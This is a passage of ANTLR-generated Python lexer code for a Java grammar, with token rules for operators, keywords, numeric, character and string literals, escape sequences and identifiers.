def mT__171(self, ):
try:
_type = T__171
_channel = DEFAULT_CHANNEL
# ./Java.g:69:8: ( '-=' )
# ./Java.g:69:10: '-='
pass
self.match("-=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__171"
# $ANTLR start "T__172"
def mT__172(self, ):
try:
_type = T__172
_channel = DEFAULT_CHANNEL
# ./Java.g:70:8: ( '*=' )
# ./Java.g:70:10: '*='
pass
self.match("*=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__172"
# $ANTLR start "T__173"
def mT__173(self, ):
try:
_type = T__173
_channel = DEFAULT_CHANNEL
# ./Java.g:71:8: ( '/=' )
# ./Java.g:71:10: '/='
pass
self.match("/=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__173"
# $ANTLR start "T__174"
def mT__174(self, ):
try:
_type = T__174
_channel = DEFAULT_CHANNEL
# ./Java.g:72:8: ( '&=' )
# ./Java.g:72:10: '&='
pass
self.match("&=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__174"
# $ANTLR start "T__175"
def mT__175(self, ):
try:
_type = T__175
_channel = DEFAULT_CHANNEL
# ./Java.g:73:8: ( '|=' )
# ./Java.g:73:10: '|='
pass
self.match("|=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__175"
# $ANTLR start "T__176"
def mT__176(self, ):
try:
_type = T__176
_channel = DEFAULT_CHANNEL
# ./Java.g:74:8: ( '^=' )
# ./Java.g:74:10: '^='
pass
self.match("^=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__176"
# $ANTLR start "T__177"
def mT__177(self, ):
try:
_type = T__177
_channel = DEFAULT_CHANNEL
# ./Java.g:75:8: ( '%=' )
# ./Java.g:75:10: '%='
pass
self.match("%=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__177"
# $ANTLR start "T__178"
def mT__178(self, ):
try:
_type = T__178
_channel = DEFAULT_CHANNEL
# ./Java.g:76:8: ( '||' )
# ./Java.g:76:10: '||'
pass
self.match("||")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__178"
# $ANTLR start "T__179"
def mT__179(self, ):
try:
_type = T__179
_channel = DEFAULT_CHANNEL
# ./Java.g:77:8: ( '&&' )
# ./Java.g:77:10: '&&'
pass
self.match("&&")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__179"
# $ANTLR start "T__180"
def mT__180(self, ):
try:
_type = T__180
_channel = DEFAULT_CHANNEL
# ./Java.g:78:8: ( '|' )
# ./Java.g:78:10: '|'
pass
self.match(124)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__180"
# $ANTLR start "T__181"
def mT__181(self, ):
try:
_type = T__181
_channel = DEFAULT_CHANNEL
# ./Java.g:79:8: ( '^' )
# ./Java.g:79:10: '^'
pass
self.match(94)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__181"
# $ANTLR start "T__182"
def mT__182(self, ):
try:
_type = T__182
_channel = DEFAULT_CHANNEL
# ./Java.g:80:8: ( '==' )
# ./Java.g:80:10: '=='
pass
self.match("==")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__182"
# $ANTLR start "T__183"
def mT__183(self, ):
try:
_type = T__183
_channel = DEFAULT_CHANNEL
# ./Java.g:81:8: ( '!=' )
# ./Java.g:81:10: '!='
pass
self.match("!=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__183"
# $ANTLR start "T__184"
def mT__184(self, ):
try:
_type = T__184
_channel = DEFAULT_CHANNEL
# ./Java.g:82:8: ( 'instanceof' )
# ./Java.g:82:10: 'instanceof'
pass
self.match("instanceof")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__184"
# $ANTLR start "T__185"
def mT__185(self, ):
try:
_type = T__185
_channel = DEFAULT_CHANNEL
# ./Java.g:83:8: ( '+' )
# ./Java.g:83:10: '+'
pass
self.match(43)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__185"
# $ANTLR start "T__186"
def mT__186(self, ):
try:
_type = T__186
_channel = DEFAULT_CHANNEL
# ./Java.g:84:8: ( '-' )
# ./Java.g:84:10: '-'
pass
self.match(45)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__186"
# $ANTLR start "T__187"
def mT__187(self, ):
try:
_type = T__187
_channel = DEFAULT_CHANNEL
# ./Java.g:85:8: ( '/' )
# ./Java.g:85:10: '/'
pass
self.match(47)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__187"
# $ANTLR start "T__188"
def mT__188(self, ):
try:
_type = T__188
_channel = DEFAULT_CHANNEL
# ./Java.g:86:8: ( '%' )
# ./Java.g:86:10: '%'
pass
self.match(37)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__188"
# $ANTLR start "T__189"
def mT__189(self, ):
try:
_type = T__189
_channel = DEFAULT_CHANNEL
# ./Java.g:87:8: ( '++' )
# ./Java.g:87:10: '++'
pass
self.match("++")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__189"
# $ANTLR start "T__190"
def mT__190(self, ):
try:
_type = T__190
_channel = DEFAULT_CHANNEL
# ./Java.g:88:8: ( '--' )
# ./Java.g:88:10: '--'
pass
self.match("--")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__190"
# $ANTLR start "T__191"
def mT__191(self, ):
try:
_type = T__191
_channel = DEFAULT_CHANNEL
# ./Java.g:89:8: ( '~' )
# ./Java.g:89:10: '~'
pass
self.match(126)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__191"
# $ANTLR start "T__192"
def mT__192(self, ):
try:
_type = T__192
_channel = DEFAULT_CHANNEL
# ./Java.g:90:8: ( '!' )
# ./Java.g:90:10: '!'
pass
self.match(33)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__192"
# $ANTLR start "T__193"
def mT__193(self, ):
try:
_type = T__193
_channel = DEFAULT_CHANNEL
# ./Java.g:91:8: ( 'new' )
# ./Java.g:91:10: 'new'
pass
self.match("new")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__193"
# $ANTLR start "T__194"
def mT__194(self, ):
try:
_type = T__194
_channel = DEFAULT_CHANNEL
# ./Java.g:92:8: ( 'public' )
# ./Java.g:92:10: 'public'
pass
self.match("public")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__194"
# $ANTLR start "T__195"
def mT__195(self, ):
try:
_type = T__195
_channel = DEFAULT_CHANNEL
# ./Java.g:93:8: ( 'protected' )
# ./Java.g:93:10: 'protected'
pass
self.match("protected")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__195"
# $ANTLR start "T__196"
def mT__196(self, ):
try:
_type = T__196
_channel = DEFAULT_CHANNEL
# ./Java.g:94:8: ( 'private' )
# ./Java.g:94:10: 'private'
pass
self.match("private")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__196"
# $ANTLR start "T__197"
def mT__197(self, ):
try:
_type = T__197
_channel = DEFAULT_CHANNEL
# ./Java.g:95:8: ( 'abstract' )
# ./Java.g:95:10: 'abstract'
pass
self.match("abstract")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__197"
# $ANTLR start "T__198"
def mT__198(self, ):
try:
_type = T__198
_channel = DEFAULT_CHANNEL
# ./Java.g:96:8: ( 'final' )
# ./Java.g:96:10: 'final'
pass
self.match("final")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__198"
# $ANTLR start "T__199"
def mT__199(self, ):
try:
_type = T__199
_channel = DEFAULT_CHANNEL
# ./Java.g:97:8: ( 'native' )
# ./Java.g:97:10: 'native'
pass
self.match("native")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__199"
# $ANTLR start "T__200"
def mT__200(self, ):
try:
_type = T__200
_channel = DEFAULT_CHANNEL
# ./Java.g:98:8: ( 'transient' )
# ./Java.g:98:10: 'transient'
pass
self.match("transient")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__200"
# $ANTLR start "T__201"
def mT__201(self, ):
try:
_type = T__201
_channel = DEFAULT_CHANNEL
# ./Java.g:99:8: ( 'volatile' )
# ./Java.g:99:10: 'volatile'
pass
self.match("volatile")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__201"
# $ANTLR start "T__202"
def mT__202(self, ):
try:
_type = T__202
_channel = DEFAULT_CHANNEL
# ./Java.g:100:8: ( 'strictfp' )
# ./Java.g:100:10: 'strictfp'
pass
self.match("strictfp")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__202"
# $ANTLR start "HexLiteral"
def mHexLiteral(self, ):
try:
_type = HexLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1470:12: ( '0' ( 'x' | 'X' ) ( HexDigit )+ ( IntegerTypeSuffix )? )
# ./Java.g:1470:14: '0' ( 'x' | 'X' ) ( HexDigit )+ ( IntegerTypeSuffix )?
pass
self.match(48)
if self.input.LA(1) == 88 or self.input.LA(1) == 120:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
# ./Java.g:1470:28: ( HexDigit )+
cnt1 = 0
while True: #loop1
alt1 = 2
LA1_0 = self.input.LA(1)
if ((48 <= LA1_0 <= 57) or (65 <= LA1_0 <= 70) or (97 <= LA1_0 <= 102)) :
alt1 = 1
if alt1 == 1:
# ./Java.g:1470:28: HexDigit
pass
self.mHexDigit()
else:
if cnt1 >= 1:
break #loop1
eee = EarlyExitException(1, self.input)
raise eee
cnt1 += 1
# ./Java.g:1470:38: ( IntegerTypeSuffix )?
alt2 = 2
LA2_0 = self.input.LA(1)
if (LA2_0 == 76 or LA2_0 == 108) :
alt2 = 1
if alt2 == 1:
# ./Java.g:1470:38: IntegerTypeSuffix
pass
self.mIntegerTypeSuffix()
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "HexLiteral"
# $ANTLR start "DecimalLiteral"
def mDecimalLiteral(self, ):
try:
_type = DecimalLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1472:16: ( ( '0' | '1' .. '9' ( '0' .. '9' )* ) ( IntegerTypeSuffix )? )
# ./Java.g:1472:18: ( '0' | '1' .. '9' ( '0' .. '9' )* ) ( IntegerTypeSuffix )?
pass
# ./Java.g:1472:18: ( '0' | '1' .. '9' ( '0' .. '9' )* )
alt4 = 2
LA4_0 = self.input.LA(1)
if (LA4_0 == 48) :
alt4 = 1
elif ((49 <= LA4_0 <= 57)) :
alt4 = 2
else:
nvae = NoViableAltException("", 4, 0, self.input)
raise nvae
if alt4 == 1:
# ./Java.g:1472:19: '0'
pass
self.match(48)
elif alt4 == 2:
# ./Java.g:1472:25: '1' .. '9' ( '0' .. '9' )*
pass
self.matchRange(49, 57)
# ./Java.g:1472:34: ( '0' .. '9' )*
while True: #loop3
alt3 = 2
LA3_0 = self.input.LA(1)
if ((48 <= LA3_0 <= 57)) :
alt3 = 1
if alt3 == 1:
# ./Java.g:1472:34: '0' .. '9'
pass
self.matchRange(48, 57)
else:
break #loop3
# ./Java.g:1472:45: ( IntegerTypeSuffix )?
alt5 = 2
LA5_0 = self.input.LA(1)
if (LA5_0 == 76 or LA5_0 == 108) :
alt5 = 1
if alt5 == 1:
# ./Java.g:1472:45: IntegerTypeSuffix
pass
self.mIntegerTypeSuffix()
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "DecimalLiteral"
# $ANTLR start "OctalLiteral"
def mOctalLiteral(self, ):
try:
_type = OctalLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1474:14: ( '0' ( '0' .. '7' )+ ( IntegerTypeSuffix )? )
# ./Java.g:1474:16: '0' ( '0' .. '7' )+ ( IntegerTypeSuffix )?
pass
self.match(48)
# ./Java.g:1474:20: ( '0' .. '7' )+
cnt6 = 0
while True: #loop6
alt6 = 2
LA6_0 = self.input.LA(1)
if ((48 <= LA6_0 <= 55)) :
alt6 = 1
if alt6 == 1:
# ./Java.g:1474:21: '0' .. '7'
pass
self.matchRange(48, 55)
else:
if cnt6 >= 1:
break #loop6
eee = EarlyExitException(6, self.input)
raise eee
cnt6 += 1
# ./Java.g:1474:32: ( IntegerTypeSuffix )?
alt7 = 2
LA7_0 = self.input.LA(1)
if (LA7_0 == 76 or LA7_0 == 108) :
alt7 = 1
if alt7 == 1:
# ./Java.g:1474:32: IntegerTypeSuffix
pass
self.mIntegerTypeSuffix()
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "OctalLiteral"
# $ANTLR start "HexDigit"
def mHexDigit(self, ):
try:
# ./Java.g:1477:10: ( ( '0' .. '9' | 'a' .. 'f' | 'A' .. 'F' ) )
# ./Java.g:1477:12: ( '0' .. '9' | 'a' .. 'f' | 'A' .. 'F' )
pass
if (48 <= self.input.LA(1) <= 57) or (65 <= self.input.LA(1) <= 70) or (97 <= self.input.LA(1) <= 102):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
finally:
pass
# $ANTLR end "HexDigit"
# $ANTLR start "IntegerTypeSuffix"
def mIntegerTypeSuffix(self, ):
try:
# ./Java.g:1480:19: ( ( 'l' | 'L' ) )
# ./Java.g:1480:21: ( 'l' | 'L' )
pass
if self.input.LA(1) == 76 or self.input.LA(1) == 108:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
finally:
pass
# $ANTLR end "IntegerTypeSuffix"
# $ANTLR start "FloatingPointLiteral"
def mFloatingPointLiteral(self, ):
try:
_type = FloatingPointLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1483:5: ( ( '0' .. '9' )+ '.' ( '0' .. '9' )* ( Exponent )? ( FloatTypeSuffix )? | '.' ( '0' .. '9' )+ ( Exponent )? ( FloatTypeSuffix )? | ( '0' .. '9' )+ Exponent ( FloatTypeSuffix )? | ( '0' .. '9' )+ FloatTypeSuffix )
alt18 = 4
alt18 = self.dfa18.predict(self.input)
if alt18 == 1:
# ./Java.g:1483:9: ( '0' .. '9' )+ '.' ( '0' .. '9' )* ( Exponent )? ( FloatTypeSuffix )?
pass
# ./Java.g:1483:9: ( '0' .. '9' )+
cnt8 = 0
while True: #loop8
alt8 = 2
LA8_0 = self.input.LA(1)
if ((48 <= LA8_0 <= 57)) :
alt8 = 1
if alt8 == 1:
# ./Java.g:1483:10: '0' .. '9'
pass
self.matchRange(48, 57)
else:
if cnt8 >= 1:
break #loop8
eee = EarlyExitException(8, self.input)
raise eee
cnt8 += 1
self.match(46)
# ./Java.g:1483:25: ( '0' .. '9' )*
while True: #loop9
alt9 = 2
LA9_0 = self.input.LA(1)
if ((48 <= LA9_0 <= 57)) :
alt9 = 1
if alt9 == 1:
# ./Java.g:1483:26: '0' .. '9'
pass
self.matchRange(48, 57)
else:
break #loop9
# ./Java.g:1483:37: ( Exponent )?
alt10 = 2
LA10_0 = self.input.LA(1)
if (LA10_0 == 69 or LA10_0 == 101) :
alt10 = 1
if alt10 == 1:
# ./Java.g:1483:37: Exponent
pass
self.mExponent()
# ./Java.g:1483:47: ( FloatTypeSuffix )?
alt11 = 2
LA11_0 = self.input.LA(1)
if (LA11_0 == 68 or LA11_0 == 70 or LA11_0 == 100 or LA11_0 == 102) :
alt11 = 1
if alt11 == 1:
# ./Java.g:1483:47: FloatTypeSuffix
pass
self.mFloatTypeSuffix()
elif alt18 == 2:
# ./Java.g:1484:9: '.' ( '0' .. '9' )+ ( Exponent )? ( FloatTypeSuffix )?
pass
self.match(46)
# ./Java.g:1484:13: ( '0' .. '9' )+
cnt12 = 0
while True: #loop12
alt12 = 2
LA12_0 = self.input.LA(1)
if ((48 <= LA12_0 <= 57)) :
alt12 = 1
if alt12 == 1:
# ./Java.g:1484:14: '0' .. '9'
pass
self.matchRange(48, 57)
else:
if cnt12 >= 1:
break #loop12
eee = EarlyExitException(12, self.input)
raise eee
cnt12 += 1
# ./Java.g:1484:25: ( Exponent )?
alt13 = 2
LA13_0 = self.input.LA(1)
if (LA13_0 == 69 or LA13_0 == 101) :
alt13 = 1
if alt13 == 1:
# ./Java.g:1484:25: Exponent
pass
self.mExponent()
# ./Java.g:1484:35: ( FloatTypeSuffix )?
alt14 = 2
LA14_0 = self.input.LA(1)
if (LA14_0 == 68 or LA14_0 == 70 or LA14_0 == 100 or LA14_0 == 102) :
alt14 = 1
if alt14 == 1:
# ./Java.g:1484:35: FloatTypeSuffix
pass
self.mFloatTypeSuffix()
elif alt18 == 3:
# ./Java.g:1485:9: ( '0' .. '9' )+ Exponent ( FloatTypeSuffix )?
pass
# ./Java.g:1485:9: ( '0' .. '9' )+
cnt15 = 0
while True: #loop15
alt15 = 2
LA15_0 = self.input.LA(1)
if ((48 <= LA15_0 <= 57)) :
alt15 = 1
if alt15 == 1:
# ./Java.g:1485:10: '0' .. '9'
pass
self.matchRange(48, 57)
else:
if cnt15 >= 1:
break #loop15
eee = EarlyExitException(15, self.input)
raise eee
cnt15 += 1
self.mExponent()
# ./Java.g:1485:30: ( FloatTypeSuffix )?
alt16 = 2
LA16_0 = self.input.LA(1)
if (LA16_0 == 68 or LA16_0 == 70 or LA16_0 == 100 or LA16_0 == 102) :
alt16 = 1
if alt16 == 1:
# ./Java.g:1485:30: FloatTypeSuffix
pass
self.mFloatTypeSuffix()
elif alt18 == 4:
# ./Java.g:1486:9: ( '0' .. '9' )+ FloatTypeSuffix
pass
# ./Java.g:1486:9: ( '0' .. '9' )+
cnt17 = 0
while True: #loop17
alt17 = 2
LA17_0 = self.input.LA(1)
if ((48 <= LA17_0 <= 57)) :
alt17 = 1
if alt17 == 1:
# ./Java.g:1486:10: '0' .. '9'
pass
self.matchRange(48, 57)
else:
if cnt17 >= 1:
break #loop17
eee = EarlyExitException(17, self.input)
raise eee
cnt17 += 1
self.mFloatTypeSuffix()
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "FloatingPointLiteral"
# $ANTLR start "Exponent"
def mExponent(self, ):
try:
# ./Java.g:1490:10: ( ( 'e' | 'E' ) ( '+' | '-' )? ( '0' .. '9' )+ )
# ./Java.g:1490:12: ( 'e' | 'E' ) ( '+' | '-' )? ( '0' .. '9' )+
pass
if self.input.LA(1) == 69 or self.input.LA(1) == 101:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
# ./Java.g:1490:22: ( '+' | '-' )?
alt19 = 2
LA19_0 = self.input.LA(1)
if (LA19_0 == 43 or LA19_0 == 45) :
alt19 = 1
if alt19 == 1:
# ./Java.g:
pass
if self.input.LA(1) == 43 or self.input.LA(1) == 45:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
# ./Java.g:1490:33: ( '0' .. '9' )+
cnt20 = 0
while True: #loop20
alt20 = 2
LA20_0 = self.input.LA(1)
if ((48 <= LA20_0 <= 57)) :
alt20 = 1
if alt20 == 1:
# ./Java.g:1490:34: '0' .. '9'
pass
self.matchRange(48, 57)
else:
if cnt20 >= 1:
break #loop20
eee = EarlyExitException(20, self.input)
raise eee
cnt20 += 1
finally:
pass
# $ANTLR end "Exponent"
# $ANTLR start "FloatTypeSuffix"
def mFloatTypeSuffix(self, ):
try:
# ./Java.g:1493:17: ( ( 'f' | 'F' | 'd' | 'D' ) )
# ./Java.g:1493:19: ( 'f' | 'F' | 'd' | 'D' )
pass
if self.input.LA(1) == 68 or self.input.LA(1) == 70 or self.input.LA(1) == 100 or self.input.LA(1) == 102:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
finally:
pass
# $ANTLR end "FloatTypeSuffix"
# $ANTLR start "CharacterLiteral"
def mCharacterLiteral(self, ):
try:
_type = CharacterLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1496:5: ( '\\'' ( EscapeSequence | ~ ( '\\'' | '\\\\' ) ) '\\'' )
# ./Java.g:1496:9: '\\'' ( EscapeSequence | ~ ( '\\'' | '\\\\' ) ) '\\''
pass
self.match(39)
# ./Java.g:1496:14: ( EscapeSequence | ~ ( '\\'' | '\\\\' ) )
alt21 = 2
LA21_0 = self.input.LA(1)
if (LA21_0 == 92) :
alt21 = 1
elif ((0 <= LA21_0 <= 38) or (40 <= LA21_0 <= 91) or (93 <= LA21_0 <= 65534)) :
alt21 = 2
else:
nvae = NoViableAltException("", 21, 0, self.input)
raise nvae
if alt21 == 1:
# ./Java.g:1496:16: EscapeSequence
pass
self.mEscapeSequence()
elif alt21 == 2:
# ./Java.g:1496:33: ~ ( '\\'' | '\\\\' )
pass
if (0 <= self.input.LA(1) <= 38) or (40 <= self.input.LA(1) <= 91) or (93 <= self.input.LA(1) <= 65534):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
self.match(39)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "CharacterLiteral"
# $ANTLR start "StringLiteral"
def mStringLiteral(self, ):
try:
_type = StringLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1500:5: ( '\"' ( EscapeSequence | ~ ( '\\\\' | '\"' ) )* '\"' )
# ./Java.g:1500:8: '\"' ( EscapeSequence | ~ ( '\\\\' | '\"' ) )* '\"'
pass
self.match(34)
# ./Java.g:1500:12: ( EscapeSequence | ~ ( '\\\\' | '\"' ) )*
while True: #loop22
alt22 = 3
LA22_0 = self.input.LA(1)
if (LA22_0 == 92) :
alt22 = 1
elif ((0 <= LA22_0 <= 33) or (35 <= LA22_0 <= 91) or (93 <= LA22_0 <= 65534)) :
alt22 = 2
if alt22 == 1:
# ./Java.g:1500:14: EscapeSequence
pass
self.mEscapeSequence()
elif alt22 == 2:
# ./Java.g:1500:31: ~ ( '\\\\' | '\"' )
pass
if (0 <= self.input.LA(1) <= 33) or (35 <= self.input.LA(1) <= 91) or (93 <= self.input.LA(1) <= 65534):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
else:
break #loop22
self.match(34)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "StringLiteral"
# $ANTLR start "EscapeSequence"
def mEscapeSequence(self, ):
try:
# ./Java.g:1505:5: ( '\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\"' | '\\'' | '\\\\' ) | UnicodeEscape | OctalEscape )
alt23 = 3
LA23_0 = self.input.LA(1)
if (LA23_0 == 92) :
LA23 = self.input.LA(2)
if LA23 == 34 or LA23 == 39 or LA23 == 92 or LA23 == 98 or LA23 == 102 or LA23 == 110 or LA23 == 114 or LA23 == 116:
alt23 = 1
elif LA23 == 117:
alt23 = 2
elif LA23 == 48 or LA23 == 49 or LA23 == 50 or LA23 == 51 or LA23 == 52 or LA23 == 53 or LA23 == 54 or LA23 == 55:
alt23 = 3
else:
nvae = NoViableAltException("", 23, 1, self.input)
raise nvae
else:
nvae = NoViableAltException("", 23, 0, self.input)
raise nvae
if alt23 == 1:
# ./Java.g:1505:9: '\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\"' | '\\'' | '\\\\' )
pass
self.match(92)
if self.input.LA(1) == 34 or self.input.LA(1) == 39 or self.input.LA(1) == 92 or self.input.LA(1) == 98 or self.input.LA(1) == 102 or self.input.LA(1) == 110 or self.input.LA(1) == 114 or self.input.LA(1) == 116:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
elif alt23 == 2:
# ./Java.g:1506:9: UnicodeEscape
pass
self.mUnicodeEscape()
elif alt23 == 3:
# ./Java.g:1507:9: OctalEscape
pass
self.mOctalEscape()
finally:
pass
# $ANTLR end "EscapeSequence"
# $ANTLR start "OctalEscape"
def mOctalEscape(self, ):
try:
# ./Java.g:1512:5: ( '\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\' ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\' ( '0' .. '7' ) )
alt24 = 3
LA24_0 = self.input.LA(1)
if (LA24_0 == 92) :
LA24_1 = self.input.LA(2)
if ((48 <= LA24_1 <= 51)) :
LA24_2 = self.input.LA(3)
if ((48 <= LA24_2 <= 55)) :
LA24_5 = self.input.LA(4)
if ((48 <= LA24_5 <= 55)) :
alt24 = 1
else:
alt24 = 2
else:
alt24 = 3
elif ((52 <= LA24_1 <= 55)) :
LA24_3 = self.input.LA(3)
if ((48 <= LA24_3 <= 55)) :
alt24 = 2
else:
alt24 = 3
else:
nvae = NoViableAltException("", 24, 1, self.input)
raise nvae
else:
nvae = NoViableAltException("", 24, 0, self.input)
raise nvae
if alt24 == 1:
# ./Java.g:1512:9: '\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' )
pass
self.match(92)
# ./Java.g:1512:14: ( '0' .. '3' )
# ./Java.g:1512:15: '0' .. '3'
pass
self.matchRange(48, 51)
# ./Java.g:1512:25: ( '0' .. '7' )
# ./Java.g:1512:26: '0' .. '7'
pass
self.matchRange(48, 55)
# ./Java.g:1512:36: ( '0' .. '7' )
# ./Java.g:1512:37: '0' .. '7'
pass
self.matchRange(48, 55)
elif alt24 == 2:
# ./Java.g:1513:9: '\\\\' ( '0' .. '7' ) ( '0' .. '7' )
pass
self.match(92)
# ./Java.g:1513:14: ( '0' .. '7' )
# ./Java.g:1513:15: '0' .. '7'
pass
self.matchRange(48, 55)
# ./Java.g:1513:25: ( '0' .. '7' )
# ./Java.g:1513:26: '0' .. '7'
pass
self.matchRange(48, 55)
elif alt24 == 3:
# ./Java.g:1514:9: '\\\\' ( '0' .. '7' )
pass
self.match(92)
# ./Java.g:1514:14: ( '0' .. '7' )
# ./Java.g:1514:15: '0' .. '7'
pass
self.matchRange(48, 55)
finally:
pass
# $ANTLR end "OctalEscape"
# $ANTLR start "UnicodeEscape"
def mUnicodeEscape(self, ):
try:
# ./Java.g:1519:5: ( '\\\\' 'u' HexDigit HexDigit HexDigit HexDigit )
# ./Java.g:1519:9: '\\\\' 'u' HexDigit HexDigit HexDigit HexDigit
pass
self.match(92)
self.match(117)
self.mHexDigit()
self.mHexDigit()
self.mHexDigit()
self.mHexDigit()
finally:
pass
# $ANTLR end "UnicodeEscape"
# $ANTLR start "ENUM"
def mENUM(self, ):
try:
_type = ENUM
_channel = DEFAULT_CHANNEL
# ./Java.g:1522:5: ( 'enum' )
# ./Java.g:1522:9: 'enum'
pass
self.match("enum")
#action start
if not(self.enumIsKeyword):
_type=Identifier;
#action end
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "ENUM"
# $ANTLR start "ASSERT"
def mASSERT(self, ):
try:
_type = ASSERT
_channel = DEFAULT_CHANNEL
# ./Java.g:1530:5: ( 'assert' )
# ./Java.g:1530:9: 'assert'
pass
self.match("assert")
#action start
if not(self.assertIsKeyword):
_type=Identifier;
#action end
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "ASSERT"
# $ANTLR start "Identifier"
def mIdentifier(self, ):
try:
_type = Identifier
_channel = DEFAULT_CHANNEL
# ./Java.g:1538:5: ( Letter ( Letter | JavaIDDigit )* )
# ./Java.g:1538:9: Letter ( Letter | JavaIDDigit )*
pass
self.mLetter()
# ./Java.g:1538:16: ( Letter | JavaIDDigit )*
while True: #loop25
alt25 = 2
LA25_0 = self.input.LA(1)
if (LA25_0 == 36 or (48 <= LA25_0 <= 57) or (65 <= LA25_0 <= 90) or LA25_0 == 95 or (97 <= LA25_0 <= 122) or (192 <= LA25_0 <= 214) or (216 <= LA25_0 <= 246) or (248 <= LA25_0 <= 8191) or (12352 <= LA25_0 <= 12687) or (13056 <= LA25_0 <= 13183) or (13312 <= LA25_0 <= 15661) or (19968 <= LA25_0 <= 40959) or (63744 <= LA25_0 <= 64255)) :
alt25 = 1
if alt25 == 1:
# ./Java.g:
pass
if self.input.LA(1) == 36 or (48 <= self.input.LA(1) <= 57) or (65 <= self.input.LA(1) <= 90) or self.input.LA(1) == 95 or (97 <= self.input.LA(1) <= 122) or (192 <= self.input.LA(1) <= 214) or (216 <= self.input.LA(1) <= 246) or (248 <= self.input.LA(1) <= 8191) or (12352 <= self.input.LA(1) <= 12687) or (13056 <= self.input.LA(1) <= 13183) or (13312 <= self.input.LA(1) <= 15661) or (19968 <= self.input.LA(1) <= 40959) or (63744 <= self.input.LA(1) <= 64255):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
else:
break #loop25
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "Identifier"
# $ANTLR start "Letter"
def mLetter(self, ):
try:
# ./Java.g:1546:5: ( '\\u0024' | '\\u0041' .. '\\u005a' | '\\u005f' | '\\u0061' .. '\\u007a' | '\\u00c0' .. '\\u00d6' | '\\u00d8' .. '\\u00f6' | '\\u00f8' .. '\\u00ff' | '\\u0100' .. '\\u1fff' | '\\u3040' .. '\\u318f' | '\\u3300' .. '\\u337f' | '\\u3400' .. '\\u3d2d' | '\\u4e00' .. '\\u9fff' | '\\uf900' .. '\\ufaff' )
# ./Java.g:
pass
